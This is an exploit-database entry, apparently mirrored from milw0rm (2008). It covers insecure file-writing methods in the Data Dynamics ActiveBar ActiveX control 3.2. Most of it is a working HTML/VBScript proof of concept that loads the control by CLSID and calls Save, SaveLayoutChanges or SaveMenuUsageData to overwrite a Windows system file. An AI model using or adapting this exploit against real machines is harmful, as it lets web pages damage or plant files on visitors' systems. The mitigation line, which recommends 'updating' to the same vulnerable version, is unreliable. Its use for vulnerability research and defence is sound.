header-logo
Suggest Exploit
vendor:
ActiveBar ActiveX Control
by:
shinnai
9.3
CVSS
HIGH
Multiple Insecure Methods
264
CWE
Product Name: ActiveBar ActiveX Control
Affected Version From: 3.2
Affected Version To: 3.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:datadynamics:activebar_activex_control
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods

Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) is vulnerable to multiple insecure methods. An attacker can exploit this vulnerability by using a malicious VBScript code to execute arbitrary code on the vulnerable system. The vulnerable methods are Save, SaveLayoutChanges and SaveMenuUsageData. An attacker can use these methods to write arbitrary files to the system.

Mitigation:

Update to the latest version of Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2).
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------
 <b>Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods</b>
 url: http://www.datadynamics.com

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>
------------------------------------------------------------------------------------

<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>

<select style="width: 404px" name="Pucca">
  <option value = "Save">Save</option>
  <option value = "SaveLayoutChanges">SaveLayoutChanges</option>

  <option value = "SaveMenuUsageData">SaveMenuUsageData</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Save" then
    test.Save "", "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   elseif Pucca.value = "SaveLayoutChanges" then
    test.SaveLayoutChanges "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   elseif Pucca.value = "SaveMenuUsageData" then
    test.SaveMenuUsageData "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   end if

 End Sub
</script></span></span></code></pre>

# milw0rm.com [2008-04-07]

Navigation

Suggest Exploit

Services By CQR